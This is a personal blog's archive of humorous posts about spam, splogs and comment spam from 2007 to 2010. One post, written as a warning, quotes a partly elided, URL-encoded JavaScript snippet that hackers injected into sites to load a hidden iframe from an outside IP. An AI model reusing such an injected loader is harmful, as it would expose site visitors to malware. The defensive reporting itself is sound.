Archive for the 'spam' Category

I find myself vaguely disappointed…

Friday, March 19th, 2010

…that the newly-arrived spam titled “Fwd: New bachelors for you” is not an equal opportunity variation on the particularly clumsy and stupid “I [Name of Allegedly Hot Russian Women] Need To Talk To You Again” spam I’ve been getting lately.

Diploma mill and mail-order bride spam is boring. Mail-order groom spam would be a welcome relief to the monotony. If I’m their idea of a solution…

Friday, March 6th, 2009

…I have to call BS on the IQ part of their name!

When we first moved to Seattle, I submitted a resume to a local staffing firm, SolutionsIQ. They’re one of the big dogs in town, particularly when it comes to getting contract work @ The Beast of Redmond. I may have updated it for them when I got laid off five or six years ago, but still… five years is a pretty long time in the tech world. Periodically, I get semi-spam from them looking for MS SQL developers, which I delete. But today… today I got a doozy:

Job Description:
An Application Support Analyst III has in-depth experience, knowledge and skills in an application support discipline (Message Processing, Mediations, Provisioning, Billing, Web, Middleware, Retail Activation Systems, Payment Processing, etc…). An Analyst III is able to work independently on escalated issues and prioritizes, investigates and resolves them with minimal guidance from others. They function as the technical leads of their teams. Occasionally an Analyst III will be given opportunities to lead teams and projects to resolve complex technical issues.

• Telecommunications experience required (4 to 6 years preferred).
• Strong experience working with Oracle on Unix using command line and GUI SQL tools.
• Strong knowledge of relational database design and support, including the support of large carrier class enterprise software systems.
• System Analysis experience in the support/operation of a of large carrier class enterprise software system, preferably in a wireless environment.
• Experience in testing, quality and change management methodologies.
• Previous experience in 24hrs/day, 7days/week systems support capacity.
• Experience in troubleshooting customer related issues and managing customer relationships required (4 to 6 years preferred).
• Extensive experience with revenue reporting and accounting.
• Business systems analytical experience required (4 to 6 years preferred
• 4 year degree (In Information Technology related field preferred) or equivalent work experience
• Schedule Hours: M-F 8 – 5, some weekends and nights

If one were to draw a Venn diagram of ‘My Skills’ and ‘This job spam,’ the universe of overlap would be, at best, a single point: SQL. And it’s the wrong dialect of SQL, to boot. Oh, and I’ve developed some middleware components. That’s all. No telco, no Unix (I hadn’t even noodled around with Linux when I last updated my resume with them), no Oracle, no ‘support of large carrier class enterprise blah blah blah’, no 24/7 support, no revenue reporting, no accounting, nothing.

I fired off a terse WTF email in response – any matching algorithm worth its salt should have left me out of that one, unless they’re really scraping the bottom of the barrel for candidates. And to scrape quite so low as me with these particular requirements strikes me as bordering on malpractice.

In short, SolutionsIQ would appear to provide neither. Discuss.


Friday, July 4th, 2008

At first, I thought it was typical penis-pill spam. You know the type: “Iron rod now!!!!!! 87% OFF FOR MAY! FREE SHIPPING!!!!”

As patterns go, it’s a pretty predictable one: some stupid erection analog with exclamation points (‘Erections!’ he ejaculated. Sorry. Free associating.) followed by some discount that’s never a number you ever see when actually, you know, shopping (94% off! 86% discount! 97%!!! Who discounts stuff at 97%? At that point, why not the age-old favorite “Hey kid, first one’s free.”?) followed by promises of discretion or free shipping or whatever else it takes to get you to click on their links.

Still, this one didn’t quite fit the pattern: “Shofars 60% OFF + FREE Delivery”

Lots of caps, a discount, free shipping, and a reference to a long, hard, pointy thing. But shofars? That’s pretty esoteric for spammers. So I had to open it… How could I not?

And lo! It really was for shofars. So, add to your list of dirty rotten spambags the Israeli company Evidently, lots of businesses share their mailing address, so I’m guessing that’s an Israeli version of Mailboxes, Etc.

Hey, since they had to have sent this late Friday night their time, isn’t it forbidden to spam on Shabbat? Or is a bot net for spamming more like the Sabbath elevators, and therefore not really work? Or maybe they’ve contracted with a Shabbat goy to send the spam…

Ah, questions for the ages!

Watch out for – only the ‘.com’ part is true

Wednesday, May 14th, 2008

Just a ‘heads up’ about a commenter named ‘Jamie Holts’ who has been leaving a lot of innocuous comments on political blogs over the last 24 hours – ‘Jamie’ is a spammer. His ‘blog’ is, which appears to consist solely of content stolen from; his ‘blogroll’ consists of links to bulk emailing software, keylogger software, splog generation software, gambling sites and get-rich-quick sites.

‘Jamie’ is building up his site’s Google juice by leaving innocuous, link-free comments that will easily get past most comment spam traps; if you use a spam-fighting service like Askimet and get a comment from someone linking back to, please flag the comment as spam before you delete it.

Jamie Holts is a spammer; is a splog. Pass it on… :-)

Truer words and all that…

Sunday, April 27th, 2008

In the old spam filter this morning, an email with the following subject:

We are a dodgy drugstore

Hmmm… I bet you are:

Web definitions for dodgy
chancy: of uncertain outcome; especially fraught with risk Curiously ineffective splog

Saturday, April 19th, 2008, also know as Math Resources, is a crappy little splog. You see, they scraped my content about The Boy’s math homework because, clearly, I’m providing some deep insight into math or homework or math homework. Isn’t it obvious that my account of eye-rolling is a highly-sought math resource? But wait! you say. What if they’re a (math) legitimate aggregator? You know, it’s (math) automated so maybe it’s (mathematics) overly inclusive?

Alas, this would be (math) wrong. See, they attributed my piece to ‘unknown’ – but the (math) spider/scraper/whatever-they’re-using stored my pseudonym to tack on to someone else’s stolen content.

So no, they just like to scrape the internet for keywords like math. Math. Math. Would I piss in their Google Juice by retyping keywords or phrases like math or mathematics or math test or math homework? Would I want them to steal this (math homework) content? I certainly (math) might.

As for the ‘curiously ineffective’ label? Their ad fraud has already been caught by Google. Pathetic little splog fraudsters… but I repeat myself.

You want to put what and what in my where!?

Thursday, March 27th, 2008

Subject line in the spam folder today: “Put Fire and Ice in your Pants”

Who could possibly think that sounds enticing?

So… I’ll bring the oxy-acteylene torch, y’all bring the dry ice – if it’s such a good idea, I think we should have the spammer try it out for us. Who’s with me?

[edited shortly after posting to correct spam subject line]

More fun with spam – pseudo-spiritual edition

Sunday, November 18th, 2007

Got this gem today:

“Know thyself” is a universal dictum passed down the centuries from all sources of wisdom. As the 21st century dawns, it has become apparent authentic self-knowledge requires comprehension of various fields of research, not only the many schools of psychology, but fields as diverse as anthropology, linguistics, neurology, and yoga, as well as insights stimulated by quantum physics and empirical explorations of alternate states of consciousness. A balanced interweaving of these and other approaches to the mind, such as literature and art, facilitates an extensive grasp of our human predicament, which is indispensable for an individual’s inner growth. But covering all this requires years of full time research. How could one possibly go about such an endeavor when caught up with today’s pace of schooling and career? Is there a solution? What if someone were to spend half a century traveling the earth, accumulating such significant knowledge along with vast worldly experience, then skillfully condense it all into one book? Remarkably, this has been accomplished.

And apparently it has been accomplished without grokking that spammers suck.

Author, poet, artist, [name of narcissistic asshole redacted] set out forty years ago to pursue a life of Zorba the
Greek adventure merged with Socratic questioning of all knowledges, which developed into a spiritual quest of the most compelling sort. After four decades of hard road travel over half the earth, [this asshole] spent seven years condensing his accumulation of knowledge into one truly informative work, [asshole’s book title redacted]. This book is gradually being internationally recognized for it’s original approach to the ultimate questions concerning the human situation.

Such as: why do spammers suck? Oh wait… scratch that one…

[This shitty book] is a challenging, enriching journey, encompassing the evolution of consciousness, while skillfully weaving mysticism, theology, psychology, philosophy, quantum physics, neurology, music, art, into meaningful and relevant patterns of clarification, never losing sight of the central theme-the endeavor to realize bottom line truths concerning our place amid the wild wonder of it all, and [this asshole] accomplishes this without succumbing to New Age credulity or sterile scientific skepticism. Every person truly concerned with the essence of philosophical inquiry and spiritual growth should have a copy close at hand.

Bottom line truth of email: spam sucks. Spam heavy on the woo sucks marginally less than spam for penis pills, Nigerian scams, and pump-and-dump stock scams, but it still sucks. Somehow you’d think someone who had mastered this spiritual pursuit would have also learned that spamming is largely the province of scam artists.

On second thought, I think I’ve answered my own question. After all, it’s just the spiritual version of “get a bigger wang,” isn’t it?

A malicious IP address to watch for: []

Monday, April 23rd, 2007

If you get an alert that your browser is trying to download something (anything!) from [], don’t do it. Why, you ask?

Because it’s probably a Trojan Horse, that’s why!

Here’s the deal – y’all probably know that I help run The Mystery of the Haunted Vampire, right? Well, some of the latest comment spam that we’ve been getting has followed a very particular pattern: .edu and .org sites (legitimate sites) with link spam goodness in support directories, like “files” or “data” or “html” or “images” – whatever. That isn’t too important. The kicker is that these f*ckers are also downloading the main index page and modifying it. Badly set site permissions then allow these spambags to post the modified main page (that looks exactly like the original back) to the main site.

The problem is that this new page is itself a Trojan Horse – it now contains a JavaScript that loads content from another site. Buried within the HTML of the hacked page is something that looks like this:

<script language="javascript"gt; document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E
%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </script>

That blah%blah%blah represents URL encoding – “unescape” tells the JavaScript to turn that gobbledy-gook back into readable characters, which in turn translates to This IP address is owned by a Russian ISP incorporated in Panama.

A Russian-owned ISP incorporated in Panama. Repeat that a couple of times, m’kay?

No, that doesn’t sound suspicious at all, does it?

They’ve changed their tactics a little over the past couple of days. When I first saw this script, they were trying to write borderless, scrolless 1 x 1 frames (ie, invisible) from the site – now, they’re masquerading as various proprietary (but safe-sounding) file formats. Whatever happens, don’t click OK!

How did I find this out? Well, yesterday after going through my standard anti-spam paces of notifying one of the victims that they’d been hacked, I notified the Russian/Panamanian ISP that they had a rogue customer since this was the 3rd or 4th time I’d seen that same IP address embedded in the JavaScript. This evening, I was browsing a random site while looking for possible vacation rentals and got the “Do you want to download this file” message – from the same IP address!

D’oh! It isn’t the IP address that’s rogue – it might be the whole bloody company!

So there you have it, kids. Don’t download anything from Russians working in Panama (God, that sounds like a Warren Zevon song, doesn’t it? Or something out of Gibson. Or Burgess, even). And if anyone from the network in question ( tries to sell you their services, ask ’em about the spammers that they harbor, ‘kay?

And lastly, if you did click “OK” recently? I hope you’ve a.) got good anti-virus software and b.) got a backup of your critical files. You’re probably going to need both…

[Updated to add: Oh yeah – if you’re using Internet Explorer, you’re *so* going to need anti-virus software. These f*ckers have been around for a while. Note to self: Russian ISPs in Panama are not to be notified that they have rogue customers – they are the rogue customers.]

EWWWW! Ew, ew, ew, eeeeeee-wwwwww!

Monday, April 23rd, 2007

In cleaning out this morning’s attempted comment spam, I found something that really gave me pause. I mean, really gave me pause. Nestled in between the typical links for sex, drugs, and rock n’ roll ringtones was a cluster of links for celebrity nudie pix. Standard enough, right?

Smack dab in the middle of those purported celeb nudes? Anna Nicole Smith autopsy photos. Nude, of course.


I mean, really… WTF? That’s just wrong on so many levels. Me, if I’m looking for skin pics, I prefer them with all their organs in the proper places*. And Y-incisions? A definite turn off. Just a thought.

*re: ‘in the proper places’ – I started to write ‘on the inside’, but strictly speaking, that wouldn’t be entirely true… Unless by ‘on the inside’ we mean… Oh, never mind.

I’m so confused

Wednesday, April 18th, 2007

Someone needs to clarify their message…

Spam for fake herbal remedy, subject #1:

  • “Don’t be left out, join millions of men”

Spam for same fake herbal remedy, subject #2:

  • “Separate yourself from other men”

So… Am I joining or separating? Which is it!?

Bonus round! Here’s a bit of advice for the less-discerning Internet shopper: Never buy an online degree from a spammer who uses the word “Unievrsity” in the subject line.

Truth in advertising

Tuesday, March 20th, 2007

It’s a spamalicious morning, I guess. In my own blog’s spam trap this morning was this nugget:

i sell im crap….read me.

me internet marketing guru

Phil Coel

me internet marketing guru

Why yes – you do sell crap. How refreshingly honest! But ‘guru’? Dunno ’bout that, Phil; this just makes you look like an idiot. Maybe you’re being joe-jobbed – if that’s the case, then you’ve got some damage control to do, because I’ve reported your site to Google Ads.

So Phil? Me not internet marketing guru. Me not sell im crap. Me blogger. Me not like spam.

Tuesday, March 20th, 2007

Hey, Google? What are you doing about this?

Three out of every four unique URLs that appeared in the top 50 results for commercial queries were spam, the study said. Blogspot is the hosting site for Google’s blogging service. Blogs created for marketing purposes are sometimes referred to as “splogs.”

Right now, is being hammered by a comment spammer who is using nothing but URLs. Hundreds and hundreds of them, all unique, all following the same pattern (, and the bots are all coming from a huge range of IP addresses, so I can’t efficiently ban access by IP blocks.

Oh, it’s all being caught by our spam trap, but still – it’s annoying as hell, and frustrating to see THE SAME HOST again and again and again. I expect to see spam on .info sites (And as an aside: can we just shitcan the entire .info top-level domain now? Please? Has anyone ever seen a valid .info site? The signal to noise ratio in this TLD is rapidly approaching zero.), and .edu domains frequently have ancient or understaffed subsystems just crying out to be exploited, but Google? Google’s got the cash and the brainpower to do this right, and well… they aren’t.

It’s almost impossible to reach abuse, and it is impossible to report more than one splog at a time. Given that Blogger’s new AJAX facade has also made it a more attractive delivery platform for malware exploits, you’d think that Google would want to make it easier to contact abuse. But no – you have to search creatively to even find the link to their crappy ‘report abuse’ form. (Here’s a hint: you’ll have better luck using Google to perform a site-specific search on instead of using the actual Blogger knowledge base.)

Now that’s customer service.

You’d also think that a company like Google would be able to discern the patterns in these splogs, and implement some proactive measures. Oh, wait! That’s right! They make money from this too, since they’re the ones selling the ad space in the first place.

Mind you, Google isn’t alone in this – AOL and Netscape’s free pages are probably equally polluted, and their abuse team is just as impossible to contact. (Surprisingly, Tripod and GeoCities are the most responsive, and easiest to contact.) But I guess I’ve come to expect a little more from Google…

Don’t be evil, right? Behold, the Invisible Hand: producing varying values of ‘evil’ since 9 March 1776.

[via /., of course…]

And, like clockwork…

Thursday, March 8th, 2007

Just to make the point of my previous post, because I used a magic phrase, a splog named O2 Bazaar sent me a trackback within an hour of posting.

How do I know O2 Bazaar is a splog? Because it’s only a month old, and has no original content – just 36 posts of stuff they’ve scraped from other blogs. So, to pee in their Google juice, let’s try this, shall we? The phrase that they like is:

‘dedicated server’ – O2 Bazaar = spammers
‘dedicated server’ – O2 Bazaar = content thieves
‘dedicated server’ – O2 Bazaar = asshats
‘dedicated server’ – O2 Bazaar = splog

O2 Bazaar is run by asshats who steal the content of others. They sell nothing, they provide nothing. They are the pubic lice of the blogosphere. They also edit the content of others to highlight the phrase related to stuff that they’re stealing: in this case, the asshats like ‘dedicated server’. Got that, O2 Bazaar? ‘dedicated server’ spammers?

How’re they gonna like that on their front page? When/if the trackback comes in, I’ll take a screenshot of them…

Oh, and if you run across a splog like O2 Bazaar that is using GoogleAds to raise revenue, report them to Google. Click on the “Ads by Google” link, then select “Provide feedback about the site you just visited.”

How many readers does your blog *really* have?

Thursday, March 8th, 2007

Over at The Mystery of the Haunted Vampire, we’ve seen a fairly large surge in comment spam attempts. In the past, I’ve tried to deal with this with a mix of plugins but the best one of these had the unfortunate side-effect of preventing the site owner (Carnacki) from accessing the blog (he’s got some funky configuration issue with his ISP, I think). We’ve been relying upon Askimet alone for a while now, and while it works really well, it’s kind of tedious having to review and delete comments. Askimet has trapped a handful of false postives, so I like to eyeball the output before deleting it. When it’s a dozen or so pieces of spam, that’s fine – but when it’s hundreds? Bleh.

Not wanting to futz around with plugins again, I opted for a blunt instrument approach: the .htaccess file. For those of you who don’t know, .htaccess is a file that you can use to control site access when you don’t have access to the root server configuration settings – which we don’t, since we don’t have a dedicated server. (Hell, we don’t even pay for a fixed IP address. MotHV is small enough that it isn’t worth the expense, particularly since the site doesn’t generate any revenue.)

Now, with .htaccess you can block individual IP addresses, but most comment spammers use a range of IP addresses. Looking at the worst offenders, I began blocking large swaths of the ‘net from accessing the site. Chinese ISPs? Gone. We’re an English-language blog, and we never get any interactive visitors from Chinese IP addresses, only bots. Hosting-only companies? Gone. Sure, some of their IP addresses may be allocated to ‘real’ domains, and some companies may be using those IP addresses as gateways, but in those cases, the IP address should resolve back to their domain name. If it’s just one IP address out of a pool of thousands? Nope. It’s a bot. You get the screamin’ 403 “Access denied” error.

I’ve used some discretion – we do get legitimate visitors from Japan, Korea, India, Thailand, & Malaysia, so I won’t take the totally drastic step that some people have of banning the entire range of APNIC IP addresses. That’s stupid. But individual ISPs in Asia that have never sent us a single legitimate visitor? Bzzt. Blocked. That one European host that is responsible for 50% of our comment spam? Every single netblock gets blocked. That US-based host responsible for another 20%? Same thing.

So the other night, I blocked a couple of dozen ranges of IP addresses, covering tens of thousands of IP addresses. Comment spam attempts are back down to a manageable amount (hundreds per day to dozens per day), though I know this will be temporary. And guess what else happened?

We lost almost 40% of our RSS subscribers.

Yup. 40%. At first I was a little surprised by the drop – but then I remembered my .htaccess changes, so I’ll say good-riddance to bad rubbish. It’ll be interesting to see how many site visitors we lose over the next few days, too – though we typically don’t count bots since we’re mostly using JavaScript-based counters to track visitors, and bots don’t run JavaScript.

So… How many of your subscribers are really just monitoring your site for activity?

[edited to add – do I lose any points for having two back-to-back posts with “*really*” in the title?]